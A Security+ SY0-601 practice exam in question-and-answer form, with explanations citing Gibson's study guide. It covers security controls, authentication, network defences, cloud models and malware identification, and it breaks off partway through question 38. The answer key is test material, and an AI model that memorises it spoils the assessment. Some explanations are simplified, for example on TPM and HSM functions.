CompTIA Security+ Get Certified Get Ahead - PRE Assessment Exam

Question 1

Your organization is planning to expand the data center to support more systems. Management wants the plan to focus on resiliency and uptime. Which of the following methods would best support these goals? (Choose TWO)

UPS
Cold site
NIC teaming
Off-site backups

Answer 1

UPS (Uninterruptible Power Supply)
NIC Teaming (Network Interface Card)

Explanation:
An uninterruptible power supply (UPS) and network interface card (NIC) teaming support resiliency and uptime goals. The UPS ensures the system stays up if power is lost. NIC teaming automatically recovers if one of the NICs or NIC inputs fail. Resiliency methods help systems heal themselves and recover from faults automatically.

A cold site cannot take over automatically and is not quick.
Off-site backups would need to be retrieved and applied by a person, so they aren’t automatic. See Chapter 1.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 123-124). YCDA, LLC. Kindle Edition.

Question 2

You are tasked with improving the overall security of several Servers in your data center. Which of the following are preventive controls that will assist with this goal? (Choose TWO)

Disabling unnecessary services.
Adding Cable Locks
Monitoring Logs on SIEM Systems
Implementing a Backup Plan
Closing unneeded ports.

Answer 2

Disabling unnecessary services.
Closing unneeded ports.

Explanation:
Disabling unnecessary services and closing unneeded ports are steps you can take to harden a server. They are preventive controls because they help prevent an incident.

Cable locks are a type of physical control and are typically used on laptops, not on servers.
Monitoring logs on security information and event management (SIEM) systems is a detective control.
A backup plan is a corrective control. See Chapter 1.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 123-124). YCDA, LLC. Kindle Edition.

Question 3

Your organization houses a Server room, and management wants to increase the Server room Security. You are tasked with identifying some deterrent controls that can be implemented to protect it. Which of the following choices would BEST meet this objective?

Hardware Locks
Data Encryption
a Vulnerability Assessment
Backups

Answer 3

Hardware Locks

Explanation:
Hardware locks are deterrent controls because they would deter someone from entering or accessing the servers in bays if bay door locks are used. They are also examples of physical controls.

None of the other answers increase the security of the server room.
Data encryption is a technical control designed to protect data on the servers.
A vulnerability assessment is a managerial control designed to discover vulnerabilities.
Backups are corrective controls designed to reverse the impact of data loss or corruption. See Chapter 1.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 124). YCDA, LLC. Kindle Edition.

Question 4

You suspect that a Linux computer is establishing connections with a remote server on the Internet without any user interaction. You want to verify this by viewing a summary of protocol statistics on a Linux System. Which of the following commands would you use?

dig
nslookup
ifconfig
netstat

Answer 4

netstat

Explanation:
The netstat -s command will display a summary of protocol statistics on a Linux system.

You can use the dig (short for domain information groper) command on Linux systems to query Domain Name System (DNS) servers and verify if you can resolve names to IP addresses.
The nslookup (short for name server lookup) command can also be used to query DNS servers.
The ifconfig command is used to display information and configure network interfaces on Linux systems. See Chapter 1.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 124). YCDA, LLC. Kindle Edition.

Question 5

You are using a Linux computer to monitor Network traffic. After connecting your computer to the mirror port of a Switch, you started logging software on the computer. However, you discover that the only traffic being collected is traffic to or from the Linux computer. You want to collect all traffic going through the Switch. Which of the following actions should you take?

Run the command ifconfig eth0 promisc
Run the command ipconfig eth0 promisc
Connect the computer to a Router
Reconfigure the Switch

Answer 5

Run the command ifconfig eth0 promisc

Explanation:
You should run the command ifconfig eth0 promisc to enable promiscuous mode on eth0, the network interface card (NIC). Promiscuous mode allows a NIC to process all traffic it receives, instead of only traffic addressed to it.

The ipconfig command is used on Windows systems and doesn’t support this feature.
The scenario indicates she wants to collect traffic going through the switch, so connecting to a router isn’t necessary.
Port mirroring on a switch sends a copy of all traffic received by the switch to the mirror port. The scenario indicates this is configured, so the switch doesn’t need to be reconfigured. See Chapter 1.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 124-125). YCDA, LLC. Kindle Edition.

Question 6

You suspect that attackers have been performing a password spraying attack against a Linux Server. Which of the following would be the BEST method of confirming your suspicions?

Use the cat command to view the auth.log file.

Implement an Account Lockout Policy.

Salt passwords to prevent the success of the spraying attack.

Use the logger command to view unsuccessful logins.

Answer 6

Use the cat command to view the auth.log file.

Explanation:
The cat command (short for concatenate) displays the entire contents of a file and the auth.log file shows all unsuccessful (and successful) logins, and this is the only choice of the available answers that confirms past activity.

An account lockout policy locks an account after too many incorrect passwords within a certain time frame, but a spraying attack uses a time lapse between each password attempt to bypass an account lockout policy.
Salting passwords is often used to prevent rainbow table-based attacks, but salts aren’t effective against spraying attacks.
The logger command is used to add log entries into the syslog file but doesn’t examine log entries. See Chapter 1.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 125). YCDA, LLC. Kindle Edition.

Question 7

Your Network includes dozens of Servers. Administrators in your organization are having problems aggregating and correlating the logs from these Servers. Which of the following provides the BEST solution for these problems?

SIEM
Syslog
NetFlow
sFlow

Answer 7

SIEM (Security Information and Event Management)

Explanation:
A security information and event management (SIEM) system collects, aggregates, and correlates logs from multiple sources.

Syslog is a protocol that specifies log entry formats that many SIEMs use. It is also the name of a log on Linux systems.
NetFlow is a network protocol (developed by Cisco) used to collect and monitor network traffic.
The sFlow (short for sampled flow) protocol is used to collect a sampling of network traffic for monitoring. See Chapter 1.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 125). YCDA, LLC. Kindle Edition.

Question 8

You are comparing different types of Authentication. Of the following choices, which one uses Multifactor Authentication?

A system that requires users to enter a Username and Password.

A system that checks an employee’s Fingerprint and does a vein scan.

A Cipher Door Lock that requires employees to enter a code to open the door.

A system that requires users to have a Smart Card and a PIN.

Answer 8

A system that requires users to have a Smart Card and a PIN.

Explanation:
A system that requires users to have a smart card and a personal identification number (PIN) uses multifactor authentication or two-factor authentication. The card is in the something you have factor, and the PIN is in the something you know factor.

A username provides identification, and a password is in the something you know factor, providing single-factor authentication.
Fingerprints and vein scans are both in the something you are factor, providing single-factor authentication.
A code for a cipher door lock is in the something you know factor, providing single-factor authentication. See Chapter 2.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 125-126). YCDA, LLC. Kindle Edition.

Question 9

The Chief Information Officer (CIO) at your organization suspects someone is entering the data center after normal working hours and stealing sensitive data. Which of the following actions can prevent this?

Upgrade the CCTV System.

Require Smart Cards to enter the data center.

Implement time-based logins.

Enable advanced auditing.

Answer 9

Implement time-based logins.

Explanation:
Time-based logins (sometimes called time-of-day restrictions) would prevent this. They would prevent anyone from logging in after normal working hours and accessing sensitive data.

All of the other answers can detect suspicious behavior, but they wouldn’t prevent the users from logging in after normal working hours and stealing the data. See Chapter 2.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 126). YCDA, LLC. Kindle Edition.

Question 10

A SQL Database server was recently attacked. Cybersecurity investigators discovered the attack was self-propagating through the Network. When it found the Database Server, it used well-known credentials to access the database. Which of the following would be the BEST action to prevent this from occurring again?

Change the default application password.
This describes a worm.
Implement 2FA
Conduct a code review.

Answer 10

Change the default application password.

Explanation:
The default application password for the SQL server should be changed. Some SQL Server software implementations can have a default blank password for the SA account (the System Administrator account), and these default credentials are well-known.

While the scenario describes a worm because it is self-propagating, the question is asking for the best preventive action to take.
Using two-factor authentication (2FA) is a good practice for users, but it isn’t always feasible for application passwords.
A code review can detect flaws and vulnerabilities in internally developed applications, but SQL Server is Microsoft software. See Chapter 2.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 126). YCDA, LLC. Kindle Edition.

Question 11

You are reviewing Security Controls and their usefulness. You notice that account lockout policies are in place. Which of the following attacks will these policies thwart? (Choose TWO)

Brute Force
DNS Poisoning
Dictionary
Replay
Buffer Overflow

Answer 11

Brute Force
Dictionary

Explanation:
Brute force and dictionary attacks attempt to guess passwords, but an account lockout control locks an account after the wrong password is guessed too many times.

The other attacks are not password attacks, so they aren’t mitigated using account lockout controls.
Domain Name System (DNS) poisoning attempts to redirect web browsers to malicious URLs.
Replay attacks attempt to capture packets to impersonate one of the parties in an online session.
Buffer overflow attacks attempt to overwhelm online applications with unexpected code or data. See Chapters 2 and 10.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 126-127). YCDA, LLC. Kindle Edition.

Question 12

** IT Administrators created a VPN for employees to use while working from home. The VPN is configured to provide AAA services. Which of the following would be presented to the AAA system for identification?

Password
Permissions
Username identification
Tunneling Certificate
Hardware Token

Answer 12

Username identification

Explanation:
Users would typically enter a username as identification for an authentication, authorization, and accounting (AAA) system.

Users would provide a password as proof that the claimed identity (the username) is theirs. The password provides authentication.
Users are assigned permissions based on their proven identity, but the permissions do not provide authentication.
The virtual private network (VPN) would encrypt traffic sent via the VPN tunnel, and this traffic may be encrypted with the use of a certificate. However, this is not called a tunneling certificate, and the certificate used for encryption does not provide identification.
A hardware token is often used as an additional method of authentication, but it does not provide identification. See Chapter 2.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 127). YCDA, LLC. Kindle Edition.

Question 13

After a recent attack, Security investigators discovered that attackers logged on with an Administrator account. They recommend implementing a solution that will thwart this type of attack in the future. The solution must support the following requirements:

Allow authorized users to access the
Administrator account without knowing the password.
Allow authorized users to check out the credentials when needed.
Log each time the credentials are used. Automatically change the password.

Which of the following answers would meet these requirements?

Privileged Access Management
OpenID Connect
MAC Scheme
MFA

Answer 13

Privileged Access Management

Explanation:
A privileged access management system protects and limits access to privileged accounts such as administrator accounts.

OpenID Connect is used for authentication and authorization on the Internet, not internal networks.
A mandatory access control (MAC) scheme uses labels to control access, but it isn’t used to control access to administrator accounts.
Multifactor authentication (MFA) uses more than one factor of authentication, but it doesn’t meet any of the requirements of this scenario. See Chapter 2.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 127). YCDA, LLC. Kindle Edition.

Question 14

** Lisa wants to implement a Secure Authentication system on a website. However, instead of collecting and storing user passwords, she wants to use a third-party system. Which of the following is the BEST choice to meet this goal?

SAML
Kerberos
SSH
OAuth

Answer 14

SAML (Security Assertion Markup Language)

Explanation:
Security Assertion Markup Language (SAML) is a single sign-on SSO solution that can use third-party websites, and it provides authentication.

Kerberos is an SSO solution used on internal networks such as in Microsoft Active Directory domains.
Secure Shell (SSH) is used for remote administration.
OAuth (think of this as Open Authorization) is used for authorization, but the scenario wants a solution for authentication. See Chapter 2.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 127-128). YCDA, LLC. Kindle Edition.

Question 15

Your organization is implementing an SDN. Management wants to use an access control scheme that controls access based on attributes. Which of the following is the BEST solution?

DAC
MAC
Role-BAC
ABAC

Answer 15

ABAC (Attribute-based Access Control)

Explanation:
A software-defined network (SDN) typically uses an attribute-based access control (ABAC) scheme. The ABAC scheme is based on attributes that identify subjects and objects within a policy.

A discretionary access control (DAC) scheme has an owner, and the owner establishes access for the objects.
A mandatory access control (MAC) scheme uses labels assigned to subjects and objects.
A role-based access control scheme uses roles or groups to assign rights and permissions. See Chapter 2.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 128). YCDA, LLC. Kindle Edition.

Question 16

Lisa uses a Linux system to regularly connect to a remote Server named gcga with a Secure SSH connection. However, the SSH account has a complex password, and she wants to avoid using it without sacrificing Security. Which of the following commands would she use as a FIRST step when creating a password-less login with the remote system?

ssh-copy-id -i ~.ssh/id_rsa.pub lisa@gcga
chmod 644 ~/.ssh/id_rsa
ssh-keygen -t rsa
ssh root@gcga

Answer 16

ssh-keygen -t rsa

Explanation:
The first step would be to enter ssh-keygen -t rsa at the terminal. This creates an RSA-based key pair (a private key and a public key). The public key’s location and the name is ~.ssh/id_rsa.pub, and the private key’s location and the name is ~/.ssh/id_rsa. The second step is to copy the public key to the remote server using the command ssh-copy-id -i ~.ssh/id_rsa.pub lisa@gcga.

The private key should always stay private, but the chmod 644 command makes it readable by everyone, so it shouldn’t be used.
The ssh command connects to the remote server using Secure Shell (SSH). If the key pair is in place, it would use the key pair for authentication and not require the complex password.
The ssh-keygen command is a utility within the OpenSSH suite of tools. See Chapter 3.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 128). YCDA, LLC. Kindle Edition.

Question 17

Your organization plans to deploy a Server in the screened subnet that will perform the following functions:

Identify Mail Servers
Provide Data Integrity
Prevent Poisoning Attacks
Respond to requests for A and AAAA records

Which of the following will BEST meet these requirements?

DNS
DNSSEC
TLS
ESP

Answer 17

DNSSEC (Domain Name System Security Extensions)

Explanation:
Domain Name System Security Extensions (DNSSEC) add security to DNS systems and can prevent DNS poisoning attacks by adding data integrity to DNS records.

The functions in the list indicate that the server in the screened subnet (sometimes called a demilitarized zone or DMZ) is a DNS server but for the DNS server to provide data integrity and prevent DNS poisoning, it needs DNSSEC. DNSSEC uses a Resource Record Signature (RRSIG), commonly referred to as a digital signature, to provide data integrity and authentication for DNS replies.
RRSIG can use Transport Layer Security (TLS) to create the signature, but TLS by itself doesn’t provide the required protection.
Internet Protocol security (IPsec) uses Encapsulating Security Payload (ESP) to encrypt data. See Chapter 3.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 129). YCDA, LLC. Kindle Edition.

Question 18

Bart incorrectly wired a Switch in your organization’s Network. It effectively disabled the Switch as though it was a victim of a Denial-of-Service Attack. Which of the following should be done to prevent this situation in the future?

Install an IDS
Only use Layer 2 Switches
Install SNMPv3 on the Switches
Implement STP or RSTP

Answer 18

Implement STP or RSTP (Spanning Tree Protocol or Rapid Spanning Tree Protocol)

Explanation:
Spanning Tree Protocol (STP) and Rapid STP (RSTP) both prevent switching loop problems. It’s rare for a wiring error to take down a switch. However, if two ports on a switch are connected to each other, it creates a switching loop and effectively disables the switch.

An intrusion detection system (IDS) will not prevent a switching loop.
Layer 2 switches are susceptible to this problem.
Administrators use Simple Network Management Protocol version 3 (SNMPv3) to manage and monitor devices, but it doesn’t prevent switching loops. See Chapter 3.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 129). YCDA, LLC. Kindle Edition.

Question 19

Maggie is a sales rep for a software company. While in a coffee shop, she uses her laptop to connect to the public WIFI, check her work emails, and upload details of a recent sale. Which of the following would she use to prevent other devices on the public Network from accessing her laptop? (Choose the BEST TWO Choices)

TPM
HSM
Firewall
DLP
VPN

Answer 19

Firewall
VPN (Virtual Private Network)

Explanation:
A firewall and a virtual private network (VPN) would prevent other devices from accessing her laptop. A host-based firewall provides primary protection. The VPN encrypts all of her Internet-based traffic going over the public Wi-Fi.

A Trusted Platform Module (TPM) provides full drive encryption and would protect the data if someone accessed the laptop, but it doesn’t prevent access.
A hardware security module (HSM) is a removable device that can generate and store RSA keys used with servers.
A data loss prevention (DLP) device helps prevent unauthorized data from leaving a network, but it doesn’t prevent access. See Chapter 3.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 129-130). YCDA, LLC. Kindle Edition.

Question 20

Your organization wants to combine some of the Security Controls used to control incoming and outgoing Network traffic. At a minimum, the solution should include Stateless Inspection, Malware Inspection, and a Content Filter. Which of the following BEST meets this goal?

VLAN
NAT
UTM
DNSEC
WAF

Answer 20

UTM (Unified Threat Management)

Explanation:
A unified threat management (UTM) device is an advanced firewall and combines multiple security controls into a single device such as stateless inspection, malware inspection, and a content filter. None of the other answers include these components.

You can configure a virtual local area network (VLAN) on a switch to provide network segmentation.
Network Address Translation (NAT) translates public IP addresses to private IP addresses and private addresses back to public IP addresses.
Domain Name System Security Extensions (DNSSEC) is a suite of extensions for DNS that provides validation for DNS responses.
A web application firewall (WAF) protects a web server from Internet-based attacks. See Chapter 3.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 130). YCDA, LLC. Kindle Edition.

Question 21

Administrators are deploying a new Linux Server in the screened subnet. After it is installed, they want to manage it from their desktop Computers located within the organization’s Private Network. Which of the following would be the BEST choice to meet this need?

Forward Proxy Server
Reverse Proxy Server
Web Application Firewall
Jump Server

Answer 21

Jump Server

Explanation:
A jump server is a server placed between different security zones, such as an internal network and a screened subnet (sometimes called a demilitarized zone or DMZ) and is used to manage devices in the other security zone. In this scenario, administrators could connect to the jump server with Secure Shell (SSH) and then connect to the Linux server using SSH forwarding on the jump server.

A forward proxy server (often called a proxy server) is used by internal clients to access Internet resources, not resources in the screened subnet.
Reverse proxy servers accept traffic from the Internet, not the internal network, and forward the traffic to one or more internal web servers.
A web application firewall (WAF) protects a web server from Internet-based attacks but isn’t used to control traffic between an internal network and the screened subnet. See Chapter 3.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 130-131). YCDA, LLC. Kindle Edition.

Question 22

Attackers have recently launched several attacks against Servers in your organization’s DMZ. You are tasked with identifying a solution that will have the best chance at preventing these attacks in the future. Which of the following is the BEST choice?

Anomaly-based IDS
Inline IPS
Passive IDS
Signature-based IDS

Answer 22

Inline IPS (Intrusion Prevention System)

Explanation:
The best solution of the given choices is an in-band intrusion prevention system (IPS). Traffic goes through the IPS, and the IPS can prevent attacks from reaching internal systems.

An intrusion detection system (IDS) is passive and not inline, so it can only detect and react to the attacks, not block them.
A signature-based IDS can detect known attacks based on the attack’s signature, but there isn’t any indication that the past attacks were known. See Chapter 4.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 131). YCDA, LLC. Kindle Edition.

Question 23

A coffee shop recently stopped broadcasting the SSID (coffeewifi) for its Wireless Network. Instead, paying customers can view it on their receipt and use it to connect to the coffee shop’s Wireless Network. Today, Lisa turned on her laptop computer, saw the SSID (coffewifi), and connected to it. Which of the following attacks is MOST likely occurring?

Rogue AP
Evil Twin
Jamming
Bluejacking

Answer 23

Evil Twin

Explanation:
An evil twin is a rogue access point (AP) with the same or similar service set identifier (SSID) as a legitimate access point. The actual SSID coffeewifi has broadcasting turned off, but the evil twin SSID of coffewifi is broadcasting, allowing users to see it.

While it is also a rogue AP, evil twin is a more accurate answer since it is similar to the actual SSID.
Jamming typically prevents anyone from connecting to a wireless network.
Bluejacking is related to Bluetooth, not wireless networks. See Chapter 4.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 131). YCDA, LLC. Kindle Edition.

Question 24

** Before personnel can enter a Secure area, they must first place their smartphones in one of several conductive metal lockboxes. The company implemented this policy because management is concerned about risks related to intellectual property. Which of the following represents the GREATEST risk to intellectual property that this policy will mitigate?

Bluesnarfing
Theft of the Smartphones
Data exfiltration over a Mobile Hotspot
To enable Geofencing

Answer 24

Bluesnarfing

Explanation:
This policy will prevent bluesnarfing, which is the unauthorized access of information from a wireless device through a Bluetooth connection.

The conductive metal lockboxes act as a small Faraday cage and will block Bluetooth signals.
While the lockboxes will help prevent theft, there’s no need to pay extra for conductive lockboxes if theft is the greatest risk.
Hotspots are typically in public locations. A company would set up a network providing Wi-Fi access, not a hotspot.
Geofencing creates a virtual fence using GPS, but devices within a Faraday cage wouldn’t be able to reach GPS. See Chapter 4.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 131). YCDA, LLC. Kindle Edition.

Question 25

Administrators are designing a site-to-site VPN between offices in two different cities. Management mandated the use of Certificates for mutual Authentication. Additionally, they want to ensure that internal IP Addresses are not revealed. Which of the following is the BEST choice to meet these requirements?

IPsec VPN using Tunnel Mode
IPsec VPN using Transport Mode
L2TP VPN
VLAN VPN

Answer 25

IPsec VPN using Tunnel Mode

Explanation:
Internet Protocol security (IPsec) using Tunnel mode is the best choice of the available answers. IPsec provides mutual authentication, and Tunnel mode will encrypt both the payload and the packet headers, hiding the internal IP addresses.

Transport mode will encrypt the payload only, leaving the internal IP addresses exposed.
A VPN using Layer 2 Tunneling Protocol (L2TP) only doesn’t provide any encryption.
Virtual local area networks (VLANs) provide network segmentation but can’t be used as a VPN. See Chapter 4.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 132). YCDA, LLC. Kindle Edition.

Question 26

** Network Administrators are considering adding an HSM to a Server in your Network. What functions will this add to the Server?

Provide full drive Encryption

Reduce the Risk of employees emailing confidential information outside the organization.

Provide Webmail to Clients

Generate and store Keys used with Servers.

Answer 26

Generate and store Keys used with Servers

Explanation:
A hardware security module (HSM) is a removable device that can generate and store RSA keys used with servers.

The keys can be used to encrypt data sent to and from the server, but they wouldn’t be used for full drive encryption.
A Trusted Platform Module (TPM) provides full drive encryption and is included in many laptops.
A data loss prevention (DLP) device is a device that can reduce the risk of employees emailing confidential information outside the organization.
Software as a Service (SaaS) provides software or applications, such as webmail, via the cloud. See Chapter 5.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 132). YCDA, LLC. Kindle Edition.

Question 27

** Bart needs to send an email to his supervisor with an attachment that includes sensitive information. He wants to maintain the confidentiality of this information. Which of the following choices is the BEST choice to meet this need?

Digital Signature
Encryption
Data Masking
Hashing

Answer 27

Encryption

Explanation:
Encryption is the best choice to provide confidentiality of any type of information, including sensitive information.

A digital signature provides integrity, non-repudiation, and authentication.
Data masking modifies the original data, producing data that looks valid but is not authentic.
Hashing provides integrity. See Chapter 5.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 132). YCDA, LLC. Kindle Edition.

Question 28

The Springfield school system stores some data in the Cloud using its own resources. The Shelbyville Nuclear Power Plant also stores some data in the Cloud using its own resources. Later, the two organizations decide to share some data in both Clouds for educational purposes. Which of the following BEST describes the Cloud created by these two organizations?

Community
Private
Public
XaaS

Answer 28

Community

Explanation:
They created a community cloud. In the scenario, the two organizations have a common goal of sharing educational materials.

The individual clouds created by each organization are private clouds, but the shared community cloud resources are not private.
A public cloud would be available to anyone, but the scenario wants to restrict access to just two organizations.
Anything as a Service (XaaS) refers to cloud services beyond IaaS, PaaS, and SaaS. See Chapter 5.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 132-133). YCDA, LLC. Kindle Edition.

Question 29

Your organization is planning to implement a CYOD deployment model. You’re asked to provide input for the new policy. Which of the following concepts are appropriate for this policy?

SCADA Access
Storage Segmentation
Database Security
Embedded RTOS

Answer 29

Storage Segmentation

Explanation:
Storage segmentation creates separate storage areas in mobile devices and can be used with a choose your own device (CYOD) mobile device deployment model where users own their devices.

None of the other answers are directly related to mobile devices.
A supervisory control and data acquisition (SCADA) system controls industrial control systems (ICSs), such as those used in nuclear power plants or water treatment facilities, and SCADA systems should be isolated.
Database security includes the use of permissions and encryption to protect data in a database but is unrelated to mobile device deployment.
Some embedded systems use a real-time operating system (RTOS) when the system must react within a specific time. See Chapter 5.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 133). YCDA, LLC. Kindle Edition.

Question 30

Your organization plans to implement desktops via the Cloud. Each desktop will include an operating system and a core group of applications needed by employees, and the Cloud provider will manage the desktops. Employees with Internet access will be able to access these desktops from anywhere and almost any device. Which of the following BEST identifies this service?

IaaS
CASB
SaaS
XaaS

Answer 30

XaaS (Anything as a Service)

Explanation:
Anything as a Service (XaaS) refers to cloud services beyond IaaS, PaaS, and SaaS. It would include desktops as a service.

Infrastructure as a Service (IaaS) is a cloud computing option where the vendor provides access to a computer.
Still, customers must install the operating system and maintain the system.
A cloud access security broker (CASB) is a software tool used to provide additional security for cloud resources, but it provides the underlying cloud services.
Software as a Service (SaaS) provides access to specific applications such as an email application, but not entire desktops. See Chapter 5.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 133). YCDA, LLC. Kindle Edition.

Question 31

A small business owner has asked you for advice. She wants to improve the company’s Security posture, but she doesn’t have any Security staff. Which of the following is the BEST solution to meet her needs?

SOAR
MSSP
SaaS
XaaS

Answer 31

MSSP (Managed Security Service Provider)

Explanation:
A managed security service provider (MSSP) is a third-party vendor that provides security services for an organization, and it is the best solution for this scenario.

A Security Orchestration, Automation, and Response (SOAR) solution automates incident response for some events, but it will augment services already provided by security staff within an organization. SOAR would not work here because the small business doesn’t have any security staff.
Software as a Service (SaaS) includes any software or application provided to users over a network such as the Internet.
Anything as a Service (XaaS) refers to cloud services beyond SaaS, IaaS, and PaaS. See Chapter 5.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 133-134). YCDA, LLC. Kindle Edition.

Question 32

Management at the Goody New Shoes retail chain decided to allow employees to connect to the internal Network using their personal mobile devices. However, the organization is having problems with these devices, including the following:

Employees do not keep their devices updated.
There is no standardization among the devices.
The organization doesn’t have adequate control over the devices.

Management wants to implement a mobile device deployment model to overcome these problems while still allowing employees to use their own devices. Which of the following is the BEST choice?

BYOD
COPE
CYOD
IaaS

Answer 32

CYOD (Choose Your Own Device)

Explanation:
A choose your own device (CYOD) mobile device deployment model includes a list of acceptable devices that employees can purchase and connect to the network. IT management can then implement a mobile device management (MDM) system to provide standardized management for these devices.

The current policy is a bring your own device (BYOD) policy, but because of the lack of standardization, it’s difficult for IT departments to adequately manage the devices and ensure they don’t introduce vulnerabilities to the network.
A corporate-owned personally enabled (COPE) policy indicates the organization owns the devices, not the employees.
Infrastructure as a Service (IaaS) is a cloud computing option where the vendor provides access to a computer, but customers must install the operating system and maintain the system. See Chapter 5.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 134). YCDA, LLC. Kindle Edition.

Question 33

During a vulnerability scan, you discover some new systems in the Network. After investigating this, you verify that these systems aren’t authorized because someone installed them without going through a standard approval process. What does this describe?

Hactivist
Script Kiddie
Shadow IT
Authorized Hacker

Answer 33

Shadow IT

Explanation:
Shadow IT refers to any systems or applications installed on a network without authorization or approval. Employees often add them to bypass security controls.

A hacktivist launches attacks as part of an activist movement or to further a cause.
A script kiddie is an attacker who uses existing computer scripts or code to launch attacks and typically has limited technical skills.
An authorized hacker (sometimes referred to as a white hat attacker) is a security professional working within the law to protect an organization from attackers. See Chapter 6.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (pp. 134-135). YCDA, LLC. Kindle Edition.

Question 34

Homer recently received a Phishing email with a malicious attachment. He was curious so he opened it to see what it was. It installed Malware on his system, and quickly spread to other systems in the Network. Security investigators discovered that the malware exploited a vulnerability that wasn’t previously known by any trusted sources. Which of the following BEST describes this attack?

Open Source Intelligence
Zero-Day
Hoax
DDoS

Answer 34

Zero-Day

Explanation:
A zero-day exploit is one that isn’t known by trusted sources such as antivirus vendors or operating system vendors.

Attackers use open source intelligence to identify a target. Some typical sources are social media sites and news outlets.
A hoax is not a specific attack. It is a message, often circulated through email that tells of impending doom from a virus or other security threat that simply doesn’t exist.
A distributed denial-of-service (DDoS) attack comes from multiple sources, not as a single phishing email. See Chapter 6.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 135). YCDA, LLC. Kindle Edition.

Question 35

** Lisa completed an antivirus scan on a Server and detected a Trojan. She removed the Trojan but was concerned that unauthorized personnel might still be able to access data on the Server and decided to check the Server further. Of the following choices, what is she MOST likely looking for on this Server?

Backdoor
Logic Bomb
Rootkit
Botnet

Answer 35

Backdoor

Explanation:
She is most likely looking for a backdoor because Trojans commonly create backdoors, and a backdoor allows unauthorized personnel to access data on the system.

Logic bombs and rootkits can create backdoor accounts, but Trojans don’t create logic bombs and would rarely install a rootkit.
The computer might be joined to a botnet, but a botnet is a group of computers. See Chapter 6.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 135). YCDA, LLC. Kindle Edition.

Question 36

Some Network appliances monitoring incoming data have recently started sending alerts on potentially malicious files. You discover that these are PE32 files with the tar.gz extension, and they are being downloaded to several user systems. After investigating further, you discover these users previously opened an email with an infected MHT file. Which of the following answers BEST describes this scenario?

The systems have joined a Botnet.
Users installed Ransomware.
Users installed a RAT, and it is downloading additional tools.
Shadow IT is running in the Network.

Answer 36

Users installed a RAT, and it is downloading additional tools.

Explanation:
This indicates that users installed a remote access Trojan (RAT) when they opened the email containing the malicious MHT file. An MHT file (or MHTML) is a webpage archive, and it will store HTML, CSS, images, JavaScript, and anything else in the webpage. After installing the RAT, attackers later began downloading Portable Executable (PE32) files to the compromised systems.

While the systems may have joined a botnet, the scenario doesn’t indicate that they are part of a botnet.
Ransomware would indicate that it has controlled the user’s computer or data, but this isn’t indicated in this scenario.
Shadow information technology (IT) refers to any unauthorized systems or applications within an organization. See Chapter 6.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 135). YCDA, LLC. Kindle Edition.

Question 37

Employees at the Marvin Monroe Memorial Hospital are unable to access any computer data. Instead, they occasionally see a message indicating that attackers encrypted all the data, and it would remain encrypted until the attackers received a hefty sum as payment. Which of the following BEST describes this attack?

Criminal Syndicate
Ransomware
Fileless Virus
Rootkit

Answer 37

Ransomware

Explanation:
The scenario describes ransomware, where attackers typically encrypt data and demand payment to release the data.

Although the attack might have been launched by a criminal syndicate because their motivation is primarily money, the question is asking about the attack, not the attacker.
A fileless virus injects code into existing scripts and may install ransomware, but a fileless virus is not ransomware.
A rootkit is a program or group of programs that provide root-level access to a system but hides itself to evade detection. See Chapter 6.

Gibson, Darril. CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide (p. 136). YCDA, LLC. Kindle Edition.

Question 38

** A SIEM system is sending several alerts indicating Malware has infected several employee computers. After examining the border Firewall and NIDS Logs, IT personnel cannot identify malicious traffic entering the Network from the Internet. Additionally, they discover that all of these employees attended a trade show during the past two days. Which of the following is the MOST likely source of this Malware?

